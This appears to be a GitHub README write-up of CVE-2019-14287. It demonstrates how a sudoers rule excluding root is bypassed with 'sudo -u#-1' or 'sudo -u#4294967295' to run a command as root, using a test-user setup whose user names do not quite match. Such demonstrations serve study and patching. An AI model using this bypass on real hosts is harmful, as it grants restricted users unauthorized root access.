CVE-2019-14287-write-up

4294967295 Sudo Bug Allows Restricted Users to Run Commands as Root

DEMONSTRATION OF VULNERABILITY

Add a new user:

sudo su - root useradd -m -s /bin/bash testuser passwd testuser // add password to user visudo

Add a new entry

test ALL=(ALL, !root) /usr/bin/id // specifying that this user cannot use id command with root user

SAVE THE FILE AND EXIT FROM ROOT USER

LOGON TO TEST USER

sudo su - test

Write command

sudo id YOU WILL BE PROMPTED WITH MESSAGE Sorry, user test is not allowed to execute '/usr/bin/id' as root

NOW WRITE COMMAND

sudo -u#-1 id OR sudo -u#4294967295 id

And there go, you have executed id command using root

Name		Name	Last commit message	Last commit date
Latest commit History 4 Commits
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

Repository files navigation

CVE-2019-14287-write-up

DEMONSTRATION OF VULNERABILITY

Add a new user:

Add a new entry

LOGON TO TEST USER

Write command

NOW WRITE COMMAND

About

Releases

Packages

gurneesh/CVE-2019-14287-write-up

Folders and files

Latest commit

History

README.md

README.md

Repository files navigation

CVE-2019-14287-write-up

DEMONSTRATION OF VULNERABILITY

Add a new user:

Add a new entry

LOGON TO TEST USER

Write command

NOW WRITE COMMAND

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Packages